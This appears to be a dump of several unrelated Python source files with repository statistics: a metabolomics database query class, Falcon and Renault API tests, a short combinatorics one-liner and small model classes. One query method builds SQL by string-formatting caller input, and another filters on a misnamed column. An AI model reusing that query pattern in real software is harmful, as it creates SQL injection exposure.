from SBaaS_base.sbaas_template_query import sbaas_template_query
class stage01_quantification_peakInformation_query(sbaas_template_query):
def initialize_supportedTables(self):
'''Set the supported tables dict for
'''
tables_supported = {'data_stage01_quantification_peakInformation':data_stage01_quantification_peakInformation,
'data_stage01_quantification_peakResolution':data_stage01_quantification_peakResolution,
};
self.set_supportedTables(tables_supported);
# Query peakInfo_parameter from data_stage01_quantificaton_peakInformation
def get_peakInfoParameter_experimentID_dataStage01PeakInformation(self,experiment_id_I):
'''Query component_names that are used for the experiment'''
try:
names = self.session.query(data_stage01_quantification_peakInformation.peakInfo_parameter).filter(
data_stage01_quantification_peakInformation.experiment_id.like(experiment_id_I),
data_stage01_quantification_peakInformation.used_.is_(True)).group_by(
data_stage01_quantification_peakInformation.component_name).order_by(
data_stage01_quantification_peakInformation.component_name.asc()).all();
names_O = [];
for n in names:
names_O.append(n.peakInfo_parameter);
return names_O;
except SQLAlchemyError as e:
print(e);
# Query data from data_stage01_quantification_peakInformation
def get_row_experimentIDAndComponentName_dataStage01PeakInformation(self, experiment_id_I, component_name_I):
"""Query rows"""
try:
data = self.session.query(data_stage01_quantification_peakInformation).filter(
data_stage01_quantification_peakInformation.experiment_id.like(experiment_id_I),
data_stage01_quantification_peakInformation.component_name.like(component_name_I),
data_stage01_quantification_peakInformation.used_.is_(True)).all();
data_O = {};
if len(data)>1:
print('more than 1 calculated_concentration retrieved per component_name')
if data:
for d in data:
data_O = {'experiment_id':d.experiment_id,
'component_group_name':d.component_group_name,
'component_name':d.component_name,
'peakInfo_parameter':d.peakInfo_parameter,
'peakInfo_ave':d.peakInfo_ave,
'peakInfo_cv':d.peakInfo_cv,
'peakInfo_lb':d.peakInfo_lb,
'peakInfo_ub':d.peakInfo_ub,
'peakInfo_units':d.peakInfo_units,
'sample_names':d.sample_names,
'sample_types':d.sample_types,
'acqusition_date_and_times':d.acqusition_date_and_times,
'peakInfo_data':d.peakInfo_data};
return data_O;
except SQLAlchemyError as e:
print(e);
def get_row_experimentIDAndPeakInfoParameterComponentName_dataStage01PeakInformation(self, experiment_id_I, peakInfo_parameter_I, component_name_I):
"""Query rows"""
try:
data = self.session.query(data_stage01_quantification_peakInformation).filter(
data_stage01_quantification_peakInformation.experiment_id.like(experiment_id_I),
data_stage01_quantification_peakInformation.component_name.like(component_name_I),
data_stage01_quantification_peakInformation.peakInfo_parameter.like(peakInfo_parameter_I),
data_stage01_quantification_peakInformation.used_.is_(True)).all();
data_O = {};
if len(data)>1:
print('more than 1 calculated_concentration retrieved per component_name')
if data:
for d in data:
data_O = {'experiment_id':d.experiment_id,
'component_group_name':d.component_group_name,
'component_name':d.component_name,
'peakInfo_parameter':d.peakInfo_parameter,
'peakInfo_ave':d.peakInfo_ave,
'peakInfo_cv':d.peakInfo_cv,
'peakInfo_lb':d.peakInfo_lb,
'peakInfo_ub':d.peakInfo_ub,
'peakInfo_units':d.peakInfo_units,
'sample_names':d.sample_names,
'sample_types':d.sample_types,
'acqusition_date_and_times':d.acqusition_date_and_times,
'peakInfo_data':d.peakInfo_data};
return data_O;
except SQLAlchemyError as e:
print(e);
def get_row_analysisID_dataStage01PeakInformation(
self,
analysis_id_I=[],
experiment_id_I=[],
peakInfo_parameter_I=[],
component_name_I=[],
component_group_name_I=[],
sample_name_abbreviation_I=[]
):
"""Query rows"""
try:
cmd = '''SELECT "data_stage01_quantification_peakInformation"."id",
"data_stage01_quantification_peakInformation"."analysis_id",
"data_stage01_quantification_peakInformation"."experiment_id",
"data_stage01_quantification_peakInformation"."component_group_name",
"data_stage01_quantification_peakInformation"."component_name",
"data_stage01_quantification_peakInformation"."peakInfo_parameter",
"data_stage01_quantification_peakInformation"."peakInfo_n",
"data_stage01_quantification_peakInformation"."peakInfo_ave",
"data_stage01_quantification_peakInformation"."peakInfo_cv",
"data_stage01_quantification_peakInformation"."peakInfo_lb",
"data_stage01_quantification_peakInformation"."peakInfo_ub",
"data_stage01_quantification_peakInformation"."peakInfo_units",
"data_stage01_quantification_peakInformation"."sample_names",
"data_stage01_quantification_peakInformation"."sample_name_abbreviation",
"data_stage01_quantification_peakInformation"."sample_types",
"data_stage01_quantification_peakInformation"."acqusition_date_and_times",
"data_stage01_quantification_peakInformation"."peakInfo_data",
"data_stage01_quantification_peakInformation"."used_",
"data_stage01_quantification_peakInformation"."comment_"
'''
cmd += '''
FROM "data_stage01_quantification_peakInformation"
'''
cmd += '''WHERE "data_stage01_quantification_peakInformation"."used_"
'''
if analysis_id_I:
cmd_q = '''AND "data_stage01_quantification_peakInformation".analysis_id =ANY ('{%s}'::text[]) '''%(
self.convert_list2string(analysis_id_I));
cmd+=cmd_q;
if experiment_id_I:
cmd_q = '''AND "data_stage01_quantification_peakInformation".experiment_id =ANY ('{%s}'::text[]) '''%(
self.convert_list2string(experiment_id_I));
cmd+=cmd_q;
if peakInfo_parameter_I:
cmd_q = '''AND "data_stage01_quantification_peakInformation"."peakInfo_parameter" =ANY ('{%s}'::text[]) '''%(
self.convert_list2string(peakInfo_parameter_I));
cmd+=cmd_q;
#if sample_name_I:
# cmd_q = '''AND "data_stage01_quantification_peakInformation".sample_name =ANY ('{%s}'::text[]) '''%(
# self.convert_list2string(sample_name_I));
# cmd+=cmd_q;
#if sample_id_I:
# cmd_q = '''AND "data_stage01_quantification_peakInformation".sample_id =ANY ('{%s}'::text[]) '''%(
# self.convert_list2string(sample_id_I));
# cmd+=cmd_q;
if sample_name_abbreviation_I:
cmd_q = '''AND "data_stage01_quantification_peakInformation".sample_name_abbreviation =ANY ('{%s}'::text[]) '''%(
self.convert_list2string(sample_name_abbreviation_I));
cmd+=cmd_q;
if component_name_I:
cmd_q = '''AND "data_stage01_quantification_peakInformation".component_name_I =ANY ('{%s}'::text[]) '''%(
self.convert_list2string(component_name_I));
cmd+=cmd_q;
if component_group_name_I:
cmd_q = '''AND "data_stage01_quantification_peakInformation".component_group_name_I =ANY ('{%s}'::text[]) '''%(
self.convert_list2string(component_group_name_I));
cmd+=cmd_q;
#if sample_type_I:
# cmd_q = '''AND "data_stage01_quantification_peakInformation".sample_type =ANY ('{%s}'::text[]) '''%(
# self.convert_list2string(sample_type_I));
# cmd+=cmd_q;
#if acquisition_date_and_time_I and not acquisition_date_and_time_I[0] is None:
# cmd_q = '''AND "data_stage01_quantification_peakInformation".acquisition_date_and_time >= %s'''%(
# acquisition_date_and_time_I[0]);
# cmd+=cmd_q;
# cmd_q = '''AND "data_stage01_quantification_peakInformation".acquisition_date_and_time <= %s'''%(
# acquisition_date_and_time_I[1]);
# cmd+=cmd_q;
cmd += '''
ORDER BY
"data_stage01_quantification_peakInformation"."analysis_id" ASC,
"data_stage01_quantification_peakInformation"."experiment_id" ASC,
"data_stage01_quantification_peakInformation"."sample_name_abbreviation" ASC,
"data_stage01_quantification_peakInformation"."component_group_name" ASC,
"data_stage01_quantification_peakInformation"."component_name" ASC,
"data_stage01_quantification_peakInformation"."peakInfo_parameter" ASC;
'''
result = self.session.execute(cmd);
data = result.fetchall();
data_O = [dict(d) for d in data];
return data_O;
except SQLAlchemyError as e:
print(e);
# Query component_names from data_stage01_quantificaton_peakInformation
def get_componentNames_experimentID_dataStage01PeakInformation(self,experiment_id_I):
'''Query component_names that are used for the experiment'''
try:
names = self.session.query(data_stage01_quantification_peakInformation.component_name).filter(
data_stage01_quantification_peakInformation.experiment_id.like(experiment_id_I),
data_stage01_quantification_peakInformation.used_.is_(True)).group_by(
data_stage01_quantification_peakInformation.component_name).order_by(
data_stage01_quantification_peakInformation.component_name.asc()).all();
names_O = [];
for n in names:
names_O.append(n.component_name);
return names_O;
except SQLAlchemyError as e:
print(e);
def get_componentNames_experimentIDAndPeakInfoParameter_dataStage01PeakInformation(self,experiment_id_I,peakInfo_parameter_I):
'''Query component_names that are used for the experiment'''
try:
names = self.session.query(data_stage01_quantification_peakInformation.component_name).filter(
data_stage01_quantification_peakInformation.experiment_id.like(experiment_id_I),
data_stage01_quantification_peakInformation.peakInfo_parameter.like(peakInfo_parameter_I),
data_stage01_quantification_peakInformation.used_.is_(True)).group_by(
data_stage01_quantification_peakInformation.component_name).order_by(
data_stage01_quantification_peakInformation.component_name.asc()).all();
names_O = [];
for n in names:
names_O.append(n.component_name);
return names_O;
except SQLAlchemyError as e:
print(e);
# Query peakInfo_parameter from data_stage01_quantification_peakResolution
def get_peakInfoParameter_experimentID_dataStage01PeakResolution(self,experiment_id_I):
'''Query component_names that are used for the experiment'''
try:
names = self.session.query(data_stage01_quantification_peakResolution.peakInfo_parameter).filter(
data_stage01_quantification_peakResolution.experiment_id.like(experiment_id_I),
data_stage01_quantification_peakResolution.used_.is_(True)).group_by(
data_stage01_quantification_peakResolution.component_name).order_by(
data_stage01_quantification_peakResolution.component_name.asc()).all();
names_O = [];
for n in names:
names_O.append(n.peakInfo_parameter);
return names_O;
except SQLAlchemyError as e:
print(e);
# Query data from data_stage01_quantification_peakResolution
def get_row_experimentIDAndComponentName_dataStage01PeakResolution(self, experiment_id_I, component_name_I):
"""Query rows"""
try:
data = self.session.query(data_stage01_quantification_peakResolution).filter(
data_stage01_quantification_peakResolution.experiment_id.like(experiment_id_I),
data_stage01_quantification_peakResolution.component_name.like(component_name_I),
data_stage01_quantification_peakResolution.used_.is_(True)).all();
data_O = {};
if len(data)>1:
print('more than 1 calculated_concentration retrieved per component_name')
if data:
for d in data:
data_O = {'experiment_id':d.experiment_id,
'component_group_name_pair':d.component_group_name_pair,
'component_name_pair':d.component_name_pair,
'peakInfo_parameter':d.peakInfo_parameter,
'peakInfo_ave':d.peakInfo_ave,
'peakInfo_cv':d.peakInfo_cv,
'peakInfo_lb':d.peakInfo_lb,
'peakInfo_ub':d.peakInfo_ub,
'peakInfo_units':d.peakInfo_units,
'sample_names':d.sample_names,
'sample_types':d.sample_types,
'acqusition_date_and_times':d.acqusition_date_and_times,
'peakInfo_data':d.peakInfo_data};
return data_O;
except SQLAlchemyError as e:
print(e);
def get_row_experimentIDAndPeakInfoParameterComponentName_dataStage01PeakResolution(self, experiment_id_I, peakInfo_parameter_I, component_name_pair_I):
"""Query rows"""
try:
data = self.session.query(data_stage01_quantification_peakResolution).filter(
data_stage01_quantification_peakResolution.experiment_id.like(experiment_id_I),
data_stage01_quantification_peakResolution.component_name_pair.any(component_name_pair_I[0]),
data_stage01_quantification_peakResolution.component_name_pair.any(component_name_pair_I[1]),
data_stage01_quantification_peakResolution.peakInfo_parameter.like(peakInfo_parameter_I),
data_stage01_quantification_peakResolution.used_.is_(True)).all();
data_O = {};
if len(data)>1:
print('more than 1 calculated_concentration retrieved per component_name')
if data:
for d in data:
data_O = {'experiment_id':d.experiment_id,
'component_group_name_pair':d.component_group_name_pair,
'component_name_pair':d.component_name_pair,
'peakInfo_parameter':d.peakInfo_parameter,
'peakInfo_ave':d.peakInfo_ave,
'peakInfo_cv':d.peakInfo_cv,
'peakInfo_lb':d.peakInfo_lb,
'peakInfo_ub':d.peakInfo_ub,
'peakInfo_units':d.peakInfo_units,
'sample_names':d.sample_names,
'sample_types':d.sample_types,
'acqusition_date_and_times':d.acqusition_date_and_times,
'peakInfo_data':d.peakInfo_data};
return data_O;
except SQLAlchemyError as e:
print(e);
# Query component_names from data_stage01_quantification_peakResolution
def get_componentNamePairs_experimentID_dataStage01PeakResolution(self,experiment_id_I):
'''Query component_names that are used for the experiment'''
try:
names = self.session.query(data_stage01_quantification_peakResolution.component_name_pair).filter(
data_stage01_quantification_peakResolution.experiment_id.like(experiment_id_I),
data_stage01_quantification_peakResolution.used_.is_(True)).group_by(
data_stage01_quantification_peakResolution.component_name_pair).order_by(
data_stage01_quantification_peakResolution.component_name_pair.asc()).all();
names_O = [];
for n in names:
names_O.append(n.component_name_pair);
return names_O;
except SQLAlchemyError as e:
print(e);
def get_componentNamePairs_experimentIDAndPeakInfoParameter_dataStage01PeakResolution(self,experiment_id_I,peakInfo_parameter_I):
'''Query component_names that are used for the experiment'''
try:
names = self.session.query(data_stage01_quantification_peakResolution.component_name_pair).filter(
data_stage01_quantification_peakResolution.experiment_id.like(experiment_id_I),
data_stage01_quantification_peakResolution.peakInfo_parameter.like(peakInfo_parameter_I),
data_stage01_quantification_peakResolution.used_.is_(True)).group_by(
data_stage01_quantification_peakResolution.component_name_pair).order_by(
data_stage01_quantification_peakResolution.component_name_pair.asc()).all();
names_O = [];
for n in names:
names_O.append(n.component_name_pair);
return names_O;
except SQLAlchemyError as e:
print(e);
#def reset_dataStage01_quantification_peakInformation(self,experiment_id_I = None):
# try:
# if experiment_id_I:
# reset = self.session.query(data_stage01_quantification_peakInformation).filter(data_stage01_quantification_peakInformation.experiment_id.like(experiment_id_I)).delete(synchronize_session=False);
# self.session.commit();
# except SQLAlchemyError as e:
# print(e);
#def reset_dataStage01_quantification_peakResolution(self,experiment_id_I = None):
# try:
# if experiment_id_I:
# reset = self.session.query(data_stage01_quantification_peakResolution).filter(data_stage01_quantification_peakResolution.experiment_id.like(experiment_id_I)).delete(synchronize_session=False);
# self.session.commit();
# except SQLAlchemyError as e:
# print(e);
def reset_dataStage01_quantification_peakInformation(self,
tables_I = ['data_stage01_quantification_peakInformation',
'data_stage01_quantification_peakResolution'],
experiment_id_I = None,
analysis_id_I = None,
warn_I=True):
try:
querydelete = sbaas_base_query_delete(session_I=self.session,engine_I=self.engine,settings_I=self.settings,data_I=self.data);
for table in tables_I:
query = {};
query['delete_from'] = [{'table_name':table}];
query['where'] = []
if analysis_id_I:
query['where'].append({
'table_name':table,
'column_name':'analysis_id',
'value':analysis_id_I,
'operator':'LIKE',
'connector':'AND'
})
if experiment_id_I:
query['where'].append({
'table_name':table,
'column_name':'experiment_id',
'value':experiment_id_I,
'operator':'LIKE',
'connector':'AND'
})
table_model = self.convert_tableStringList2SqlalchemyModelDict([table]);
query = querydelete.make_queryFromString(table_model,query);
querydelete.reset_table_sqlalchemyModel(query_I=query,warn_I=warn_I);
except Exception as e:
print(e); | 57.410811 | 211 | 0.652669 | 2,154 | 21,242 | 5.985608 | 0.063603 | 0.171023 | 0.199721 | 0.21407 | 0.866362 | 0.812379 | 0.746529 | 0.688436 | 0.654774 | 0.620181 | 0 | 0.016949 | 0.263958 | 21,242 | 370 | 212 | 57.410811 | 0.807675 | 0.121552 | 0 | 0.660256 | 0 | 0 | 0.221528 | 0.132529 | 0 | 0 | 0 | 0 | 0 | 1 | 0.041667 | false | 0 | 0.025641 | 0 | 0.105769 | 0.051282 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
c1b41e940cc0828bc4ad39d63e2de50ecbfff59c | 177 | py | Python | diting/__init__.py | WenlongShen/Diting | d6776105679be37f81b24b2d7ba5b20def28253b | [
"MIT"
] | null | null | null | diting/__init__.py | WenlongShen/Diting | d6776105679be37f81b24b2d7ba5b20def28253b | [
"MIT"
] | null | null | null | diting/__init__.py | WenlongShen/Diting | d6776105679be37f81b24b2d7ba5b20def28253b | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# coding: utf-8
from diting.utils import *
from diting.parse import *
from diting.encoding import *
from diting.models import *
from diting.plot import *
| 19.666667 | 29 | 0.751412 | 27 | 177 | 4.925926 | 0.555556 | 0.37594 | 0.481203 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006623 | 0.146893 | 177 | 8 | 30 | 22.125 | 0.874172 | 0.19209 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
c1df5c68918364d1ee130d155125e6b4ca0febbb | 3,806 | py | Python | tests/test_api.py | DominikZabron/tracker | d26b444428682de3e9c918418b7186097d39db17 | [
"MIT"
] | null | null | null | tests/test_api.py | DominikZabron/tracker | d26b444428682de3e9c918418b7186097d39db17 | [
"MIT"
] | null | null | null | tests/test_api.py | DominikZabron/tracker | d26b444428682de3e9c918418b7186097d39db17 | [
"MIT"
] | null | null | null | import falcon
import pytest
import uuid
from mock import patch, MagicMock
from tracker.urls import app as application
application.req_options.auto_parse_form_urlencoded = True
mock = MagicMock()
mock.exists.return_value = 1
mock.setex = MagicMock()
mock.proc_req_delay = MagicMock()
@pytest.fixture
def app():
return application
@patch('tracker.urls.db_save.delay', mock.proc_req_delay)
@patch('tracker.utils.cache.setex', mock.setex)
def test_post_item_success(client):
mock.setex.call_count = 0
payload = {'external_id': 'abc'}
headers = {'Content-Type': 'application/json'}
resp = client.post('/item', payload, headers=headers)
assert resp.status == falcon.HTTP_201
assert mock.setex.call_count == 1
@patch('tracker.urls.db_save.delay', mock.proc_req_delay)
@patch('tracker.utils.cache.setex', mock.setex)
def test_post_item_returns_correct_response(client):
mock.setex.call_count = 0
payload = {'external_id': 'abc'}
headers = {'Content-Type': 'application/json'}
resp = client.post('/item', payload, headers=headers)
assert 'cart_id' in resp.json
assert mock.setex.call_count == 1
@patch('tracker.urls.db_save.delay', mock.proc_req_delay)
@patch('tracker.hooks.cache.exists', mock.sismember)
def test_post_item_accept_param(client):
mock.sismember.call_count = 0
cart_id = str(uuid.uuid4())
payload = {'external_id': 'abc'}
headers = {'Content-Type': 'application/json'}
resp = client.post('/item/{0}'.format(cart_id), payload, headers=headers)
assert mock.sismember.call_count == 1
assert cart_id == resp.json['cart_id']
@patch('tracker.urls.db_save.delay', mock.proc_req_delay)
@patch('tracker.hooks.cache.exists', mock.sismember)
def test_post_item_handle_cookies(client):
mock.sismember.call_count = 0
cart_id = str(uuid.uuid4())
cookie = 'cart_id={0}'.format(cart_id)
payload = {'external_id': 'abc'}
headers = {'Cookie': cookie, 'Content-Type': 'application/json'}
resp = client.post('/item', payload, headers=headers)
assert cart_id == resp.json['cart_id']
assert cookie == resp.headers['set-cookie'].split(';')[0]
assert mock.sismember.call_count == 1
@patch('tracker.urls.db_save.delay', mock.proc_req_delay)
@patch('tracker.hooks.cache.exists', mock.sismember)
def test_post_item_validate_input_fail(client):
mock.sismember.call_count = 0
uuid_1, uuid_2 = str(uuid.uuid4()), str(uuid.uuid4())
cookie = 'cart_id={0}'.format(uuid_1)
payload = {'external_id': 'abc'}
headers = {'Cookie': cookie, 'Content-Type': 'application/json'}
resp = client.post('/item/{0}'.format(uuid_2), payload, headers=headers)
assert resp.status == falcon.HTTP_400
assert resp.json['title'] == "Bad request"
assert mock.sismember.call_count == 0
@patch('tracker.urls.db_save.delay', mock.proc_req_delay)
@patch('tracker.hooks.cache.exists', mock.sismember)
def test_post_item_validate_input_success(client):
mock.sismember.call_count = 0
cart_id = str(uuid.uuid4())
cookie = 'cart_id={0}'.format(cart_id)
payload = {'external_id': 'abc'}
headers = {'Cookie': cookie, 'Content-Type': 'application/json'}
resp = client.post('/item/{0}'.format(cart_id), payload, headers=headers)
assert resp.status == falcon.HTTP_201
assert mock.sismember.call_count == 1
@patch('tracker.urls.db_save.delay', mock.proc_req_delay)
@patch('tracker.utils.cache.setex', mock.setex)
def test_post_item_cart_id_not_exist(client):
mock.setex.call_count = 0
cart_id = str(uuid.uuid4())
payload = {'external_id': 'abc'}
headers = {'Content-Type': 'application/json'}
resp = client.post('/item/{0}'.format(cart_id), payload, headers=headers)
assert resp.status == falcon.HTTP_404
assert mock.setex.call_count == 0
| 35.90566 | 77 | 0.709143 | 539 | 3,806 | 4.810761 | 0.152134 | 0.041651 | 0.034709 | 0.049364 | 0.824913 | 0.804088 | 0.778249 | 0.762823 | 0.732742 | 0.732742 | 0 | 0.01369 | 0.136364 | 3,806 | 105 | 78 | 36.247619 | 0.775175 | 0 | 0 | 0.651163 | 0 | 0 | 0.211508 | 0.09485 | 0 | 0 | 0 | 0 | 0.186047 | 1 | 0.093023 | false | 0 | 0.05814 | 0.011628 | 0.162791 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
a9da23b02a106bf09f211285c1eadf1692b49b91 | 92 | py | Python | Introductory Problems/Two Knights.py | charlie219/CSES-Solutions | e082380cbb3ad74eaa9a55f71a2f9df904477ef2 | [
"MIT"
] | null | null | null | Introductory Problems/Two Knights.py | charlie219/CSES-Solutions | e082380cbb3ad74eaa9a55f71a2f9df904477ef2 | [
"MIT"
] | null | null | null | Introductory Problems/Two Knights.py | charlie219/CSES-Solutions | e082380cbb3ad74eaa9a55f71a2f9df904477ef2 | [
"MIT"
] | null | null | null | print(*[int(((x**2*(x**2-1))/2)-4*(x-1)*(x-2)) for x in range(1,int(input())+1)],sep='\n')
| 46 | 91 | 0.478261 | 23 | 92 | 1.913043 | 0.521739 | 0.136364 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.104651 | 0.065217 | 92 | 1 | 92 | 92 | 0.406977 | 0 | 0 | 0 | 0 | 0 | 0.021978 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
a9dbeed588769a487d0c3140087a6f2d11e9005c | 4,562 | py | Python | tests/cli/test_vehicle_hvac.py | slater0013/renault-api | 13c784b6af09331368341c93888f1eb32c46cb19 | [
"MIT"
] | 44 | 2020-11-01T15:52:33.000Z | 2022-03-31T04:40:03.000Z | tests/cli/test_vehicle_hvac.py | slater0013/renault-api | 13c784b6af09331368341c93888f1eb32c46cb19 | [
"MIT"
] | 334 | 2020-11-01T13:00:01.000Z | 2022-03-31T17:17:40.000Z | tests/cli/test_vehicle_hvac.py | slater0013/renault-api | 13c784b6af09331368341c93888f1eb32c46cb19 | [
"MIT"
] | 22 | 2020-11-20T08:26:26.000Z | 2022-03-11T18:58:31.000Z | """Test cases for the __main__ module."""
from aioresponses import aioresponses
from aioresponses.core import RequestCall
from click.testing import CliRunner
from tests import fixtures
from yarl import URL
from . import initialise_credential_store
from renault_api.cli import __main__
def test_hvac_history_day(
mocked_responses: aioresponses, cli_runner: CliRunner
) -> None:
"""It exits with a status code of zero."""
initialise_credential_store(include_account_id=True, include_vin=True)
fixtures.inject_get_hvac_history(
mocked_responses, start="20201101", end="20201130", period="day"
)
result = cli_runner.invoke(
__main__.main, "hvac history --from 2020-11-01 --to 2020-11-30 --period day"
)
assert result.exit_code == 0, result.exception
expected_output = "{}\n"
assert expected_output == result.output
def test_hvac_history_month(
mocked_responses: aioresponses, cli_runner: CliRunner
) -> None:
"""It exits with a status code of zero."""
initialise_credential_store(include_account_id=True, include_vin=True)
fixtures.inject_get_hvac_history(
mocked_responses, start="202011", end="202011", period="month"
)
result = cli_runner.invoke(
__main__.main, "hvac history --from 2020-11-01 --to 2020-11-30"
)
assert result.exit_code == 0, result.exception
expected_output = "{}\n"
assert expected_output == result.output
def test_hvac_cancel(mocked_responses: aioresponses, cli_runner: CliRunner) -> None:
"""It exits with a status code of zero."""
initialise_credential_store(include_account_id=True, include_vin=True)
url = fixtures.inject_set_hvac_start(mocked_responses, result="cancel")
fixtures.inject_get_vehicle_details(mocked_responses, "zoe_40.1.json")
result = cli_runner.invoke(__main__.main, "hvac cancel")
assert result.exit_code == 0, result.exception
expected_json = {"data": {"attributes": {"action": "cancel"}, "type": "HvacStart"}}
expected_output = "{'action': 'cancel'}\n"
request: RequestCall = mocked_responses.requests[("POST", URL(url))][0]
assert expected_json == request.kwargs["json"]
assert expected_output == result.output
def test_sessions(mocked_responses: aioresponses, cli_runner: CliRunner) -> None:
"""It exits with a status code of zero."""
initialise_credential_store(include_account_id=True, include_vin=True)
fixtures.inject_get_hvac_sessions(
mocked_responses, start="20201101", end="20201130"
)
result = cli_runner.invoke(
__main__.main, "hvac sessions --from 2020-11-01 --to 2020-11-30"
)
assert result.exit_code == 0, result.exception
expected_output = "{}\n"
assert expected_output == result.output
def test_hvac_start_now(mocked_responses: aioresponses, cli_runner: CliRunner) -> None:
"""It exits with a status code of zero."""
initialise_credential_store(include_account_id=True, include_vin=True)
url = fixtures.inject_set_hvac_start(mocked_responses, "start")
result = cli_runner.invoke(__main__.main, "hvac start --temperature 25")
assert result.exit_code == 0, result.exception
expected_json = {
"data": {
"attributes": {"action": "start", "targetTemperature": 25},
"type": "HvacStart",
}
}
expected_output = "{'action': 'start', 'targetTemperature': 21.0}\n"
request: RequestCall = mocked_responses.requests[("POST", URL(url))][0]
assert expected_json == request.kwargs["json"]
assert expected_output == result.output
def test_hvac_start_later(
mocked_responses: aioresponses, cli_runner: CliRunner
) -> None:
"""It exits with a status code of zero."""
initialise_credential_store(include_account_id=True, include_vin=True)
url = fixtures.inject_set_hvac_start(mocked_responses, "start")
result = cli_runner.invoke(
__main__.main, "hvac start --temperature 24 --at '2020-12-25T11:50:00+02:00'"
)
assert result.exit_code == 0, result.exception
expected_json = {
"data": {
"attributes": {
"action": "start",
"startDateTime": "2020-12-25T09:50:00Z",
"targetTemperature": 24,
},
"type": "HvacStart",
}
}
expected_output = "{'action': 'start', 'targetTemperature': 21.0}\n"
request: RequestCall = mocked_responses.requests[("POST", URL(url))][0]
assert expected_json == request.kwargs["json"]
assert expected_output == result.output
| 35.92126 | 87 | 0.690925 | 559 | 4,562 | 5.363148 | 0.182469 | 0.080053 | 0.058372 | 0.06004 | 0.825884 | 0.814877 | 0.79553 | 0.773516 | 0.773516 | 0.768846 | 0 | 0.040464 | 0.187418 | 4,562 | 126 | 88 | 36.206349 | 0.768276 | 0.056335 | 0 | 0.526882 | 0 | 0.010753 | 0.156243 | 0.006325 | 0 | 0 | 0 | 0 | 0.16129 | 1 | 0.064516 | false | 0 | 0.075269 | 0 | 0.139785 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
e71e19623fff49ecfd7c465a6def6c1ea77542ac | 161 | py | Python | configs/configs.py | sunnyfloyd/panderyx | 82f03625159833930ff044a43a6619ab710ff159 | [
"MIT"
] | null | null | null | configs/configs.py | sunnyfloyd/panderyx | 82f03625159833930ff044a43a6619ab710ff159 | [
"MIT"
] | null | null | null | configs/configs.py | sunnyfloyd/panderyx | 82f03625159833930ff044a43a6619ab710ff159 | [
"MIT"
] | null | null | null | from typing import Union
from pydantic import BaseModel, HttpUrl, FilePath
class InputConfig(BaseModel):
path: Union[HttpUrl, FilePath]
extension: str
| 20.125 | 49 | 0.770186 | 19 | 161 | 6.526316 | 0.684211 | 0.241935 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.167702 | 161 | 7 | 50 | 23 | 0.925373 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.4 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
e759e274a339dc35108d4d129079e7b48b08af66 | 210 | py | Python | ecommerce_api/core/discount/interfaces.py | victormartinez/ecommerceapi | a887d9e938050c15ebf52001f63d7aa7f33fa5ee | [
"MIT"
] | null | null | null | ecommerce_api/core/discount/interfaces.py | victormartinez/ecommerceapi | a887d9e938050c15ebf52001f63d7aa7f33fa5ee | [
"MIT"
] | null | null | null | ecommerce_api/core/discount/interfaces.py | victormartinez/ecommerceapi | a887d9e938050c15ebf52001f63d7aa7f33fa5ee | [
"MIT"
] | null | null | null | from abc import ABC, abstractmethod
from typing import Optional
class AbstractDiscountClient(ABC):
@abstractmethod
def get_discount_percentage(self, product_id: int) -> Optional[float]:
pass
| 21 | 74 | 0.752381 | 24 | 210 | 6.458333 | 0.75 | 0.219355 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.180952 | 210 | 9 | 75 | 23.333333 | 0.901163 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0.166667 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
